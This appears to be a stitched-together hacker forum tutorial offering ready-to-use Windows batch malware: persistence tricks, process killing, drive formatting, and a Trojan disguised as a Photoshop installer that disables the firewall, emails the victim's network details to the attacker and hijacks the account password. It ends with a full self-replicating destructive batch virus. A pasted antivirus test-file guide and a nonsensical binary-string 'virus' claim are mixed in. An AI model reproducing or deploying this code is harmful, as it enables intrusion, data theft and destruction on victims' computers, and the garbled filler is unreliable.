Create Deadly DOS Batch Viruses
Here is a tool Box of things that are used to make batch viruses! I made it because the n0obs like batch because you don't have to compile it and you can act l33T cuz U can write in notepad.
It's just a bunch of things you can use to make your own batch virus!
*********** Basics ***********
Code:
@Echo offSo the file dsnt show full commands.
Copying a file to a directory of your choice.
Code:
copy %0 %systemroot%\YOUR PROGRAM NAME.bat > nul-Copys to System Root.
Code:
copy %0 *.bat > nulCopys to the same directory as your batch file.
To kill a running process...
NOTE: Press Ctrl + Alt+ Delete and go to process and there are some things that you could use such as shutting down internet TEH PWNAGE all svchost or svhost's do not put .exe after them
Code:
tskill explorer
tskill what you want
To append your file to autoexe.bat so it runs with everythin else...
Code:
echo copy %0 >> c:\autoexec.bat
echo rem Location of your file >> c:\autoexec.batOr if you perfer win.ini...
Code:
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\MiXedVeX.bat >> %systemroot%\win.ini
echo run=%systemroot%\MiXedVeX.bat >> %systemroot%\win.iniMaking your file hidden...
Code:
Attrib +r +h filename&locationhere.batDeleting Stuff with Batch...
Code:
del C:\Progra~1\Accessories\Calc.EXE*********** Payloads ***********
Creating an infinite loop of windows so that the person can't close them...
Code:
:1337 <------------------- I just used that dont put that
start %0
goto 1337Shutting down the victim's PC...
Code:
shutdown -f -t 15This does it forcefully and in 15 seconds.
Adding your virus to startup...
Code:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\MiXedVeX.bat /f > nulFormatting C: Drive...
Code:
format C:
Alright, open up notepad, and start your Batch file. Use whatever coding you
like using to begin.
OK, now that you have done that, let's start our first Batch Trojan Horse.
--About this Trojan Horse--- It is NOT extremely complex and does NOT do all
of the things that some .EXE Trojans will do. It is just to make an example
of a basic remote access program. If you use your immagination, I am sure that
you will be able to make a much better Trojan that does almost anything you want.
*This is not a particularly discreet trojan Horse, however an ignorant computer user
will have no clue what is going on.
Coding:
OK, step one, let's make this file an auto-run. Slap on the code I
specified in my previous article and let's get started.
Step two, this program is going to need to disable the firewall and keep
itself from bieng detected by an anti-virus program. (This is a good example
of how this program is NOT discreet.)
We will simply disable both of those services for the time bieng.
Use this code:
Code:
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0This set of commands is self explanatory, it stops the security cenrer, then
flashes through registry and kills the firewall.
Now we have an auto-run Batch program that upon boot, will auto-run itself
and disable the firewall/security center.
Now we need to give ourselves this person's IP address...
I don't know if I was the first person to consider using a command prompt
mail client program as a way of stealing an IP address, hehe, but here we go.
You are going to need to download the mail client "febooti.exe"
and you can do so from the following URL:
http://www.febooti.com/downloads/
Ok, now that you have that, let's get too work.
Go back to your batch file and put on some febooti commands that will email you this
user/victim's IP address/whatever else you want.
Here we go:
Code:
ipconfig >Computer-IP-address.txt
febootimail -FROM THIEREMAIL-TO YOUR EMAIL-ATTACH Computer-IP-address.txt
MSG "Victims IP is inside file attatchment Computer-IP-address.txt"
del Computer-IP-address.txtThis is a relatively simple script; allow me to explain it. First we use the "ipconfig"
command, which will give us the user's IP information. If you are in a particularly
malicious mood, you may want to use the command "IPconfig /all" which will also give you
there user names, MAC address, etc.
Now that we have run this command, we simple use ">" to copy it into a text file that we call
Computer-IP-address.txt, which will be saved into the current directory.
Next, (assuming the user has opened up febooti already) you use the febooti command
to send Mail from (as an example) RedBishopX to ZoneVortex.
We use the "MSG" command to write the body of the email, which says: "Victim's IP is
attatched to this email, etc."
Then we attach our text file with all of the sensitive information in it, to the email.
So here is what we have done:
disabled the firewall/security
sent an email to your email account with the user's IP information
Now, you can simply whip open Your remote access terminal (start-allprograms-accessories-communications-remote desktop)
enter int he user's IP, and if they are online, you will connect directly to their machine.
But Uh-oh... you are required to enter their password.
Go back to your Batch file.
You are going to want to create an account that you can log in with.
So you have too options: you can either change the user's password and log
in as him, or create a new profile and delete it when you are done.
Incase you forgot the command to change his username will be "net user %username% (new password)
It is up to you to do which ever of those 2 things you wish. I would reccomend changing their password,
logging in and doing whatever it was that you needed to do, then using Cain and Abel to sniff their old password,
and change it back to that.
Now let's zip our Trojan Programs together in a .ZIP folder.
Let's pretend we are desguising it as a photoshop.
ZIP folder:
(example)
Photoshop4.exe.bat-----(Our Batch program)
(Code for this program
Code:
@echo off
cls
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
cls
ipconfig >Computer-IP-address.txt
febootimail -FROM [email protected] -TO [email protected] -ATTACH Computer-IP-address.txt
MSG "Victims IP is inside file attatchment Computer-IP-address.txt"
del Computer-IP-address.txt
clsPhotoshop_setup.exe-----(febootimail.exe)
Readme.txt-----(For social engineering purposes, getting them to open this stuff in the right order)
(example)
///// Welcome to Photoshop4!! \
This program is the published product of Microsoft Inc.
Setup:
Open and install "Photosop_setup.exe", this program will use the "febooti"
mail system to verify your request, and get you registered.
Once this is done, open the executable "Photoshop", and begin your wonderful experience.
How do I Test My VirusScan Installation? (Eicar)
Description
After installing VirusScan, you may logically wonder, how do I know if it's working? The answer is a test virus. The EICAR Standard AntiVirus Test File is a combined effort by anti-virus vendors throughout the world to implement one standard by which customers can verify their anti-virus installations.
Solution
To test your installation, copy the following line into its own file, then save the file with the name EICAR.COM. More detailed instructions are found below.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
The file size will be 68 or 70 bytes.
If VirusScan is running and configured correctly, when you try to save the file, VirusScan will detect the virus. If VirusScan is not running, start it and scan the directory that contains EICAR.COM. When your software scans this file, it will report finding the EICAR test file.
Note that this file is NOT A VIRUS. Delete the file when you have finished testing your installation to avoid alarming unsuspecting
users.
The eicar test virus is available for download from the following website:
http://www.eicar.org/download/eicar.com
Creating Eicar.com
1. Click on Start.
2. Select Run.
3. In the Open box type: notepad
4. Maximize the window.
5. Highlight the following on the following line of text:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
6. Right click on the highlighted text and choose 'copy'.
7. Switch back to Notepad.
8. Right click anywhere inside of Notepad and select 'paste'.
9. Click the File menu and select 'save as'.
10. Change the 'Save as Type' to 'all files'.
11. Name the file eicar.com.
This is a simple virus that formats HDD.
Write The Following In Notepad Exactly as it says
010010110001111100100101010101010000011111100000
Save As An EXE Any Name Will Do
Send the EXE to People And Infect
WARNING: I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS!!!
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
------------------------------------------------------------------------------------------
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
